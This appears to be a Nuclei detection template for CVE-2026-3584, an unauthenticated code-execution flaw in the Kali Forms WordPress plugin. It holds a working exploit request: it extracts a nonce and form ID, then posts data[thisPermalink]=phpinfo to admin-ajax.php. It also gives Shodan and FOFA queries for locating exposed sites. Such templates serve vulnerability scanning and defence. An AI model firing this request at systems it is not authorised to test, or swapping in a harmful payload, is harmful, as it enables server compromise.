id: CVE-2026-3584 info: name: WordPress Kali Forms <= 2.4.9 - Remote Code Execution author: pussycat0x severity: critical description: | Kali Forms WordPress plugin <= 2.4.9 contains a remote code execution caused by unsafe user input handling in 'form_process' and 'prepare_post_data' functions, letting unauthenticated attackers execute code on the server, exploit requires no authentication. impact: | Unauthenticated attackers can execute arbitrary code on the server, potentially leading to full system compromise. remediation: | Update to the latest version beyond 2.4.9. reference: - https://wordpress.org/plugins/kali-forms/ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-3584 epss-score: 0.07239 epss-percentile: 0.93569 cwe-id: CWE-94 metadata: verified: true max-request: 6 product: kali-forms framework: wordpress fofa-query: body="kali-forms" shodan-query: http.component:"WordPress" http.html:"kali-forms" tags: cve,cve2026,wordpress,wp-plugin,kali-forms,rce,unauth,vkev flow: | var paths = ["/contact-us/", "/contact/", "/form/", "/feedback/", "/"]; for (var i = 0; i < paths.length; i++) { set("form_path", paths[i]); if (http(1)) { http(2); break; } } http: - raw: - | GET {{form_path}} HTTP/1.1 Host: {{Hostname}} redirects: true max-redirects: 3 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "KaliFormsObject")' - 'contains(body, "ajax_nonce")' condition: and internal: true extractors: - type: regex name: nonce part: body group: 1 regex: - 'ajax_nonce":"([a-f0-9]+)"' internal: true - type: regex name: form_id part: body group: 1 regex: - 'data-form-id="(\d+)"' internal: true - type: regex name: version part: body group: 1 regex: - 'kali-forms/[^"]*(?:js|css)\?ver=([0-9.]+)' internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=kaliforms_form_process&data[nonce]={{nonce}}&data[formId]={{form_id}}&data[first-name]=test&data[last-name]=user&data[email]=test%40example.com&data[message]=test&data[thisPermalink]=phpinfo matchers-condition: and matchers: - type: word part: body words: - "phpinfo()" - "PHP Extension" - "PHP Version" condition: and - type: status status: - 200 extractors: - type: regex name: php_version part: body group: 1 regex: - 'PHP Version ([0-9.]+)' # digest: 4a0a0047304502203aa00f646a9b307da9caff214477aa98aa26f0e7754a75e5f33e4b294bfce6dc022100a8aa349dd63d13f38c57e38056c79a58870880d00aa2cf034fca856865a59c84:922c64590222798bb761d5b6d8e72950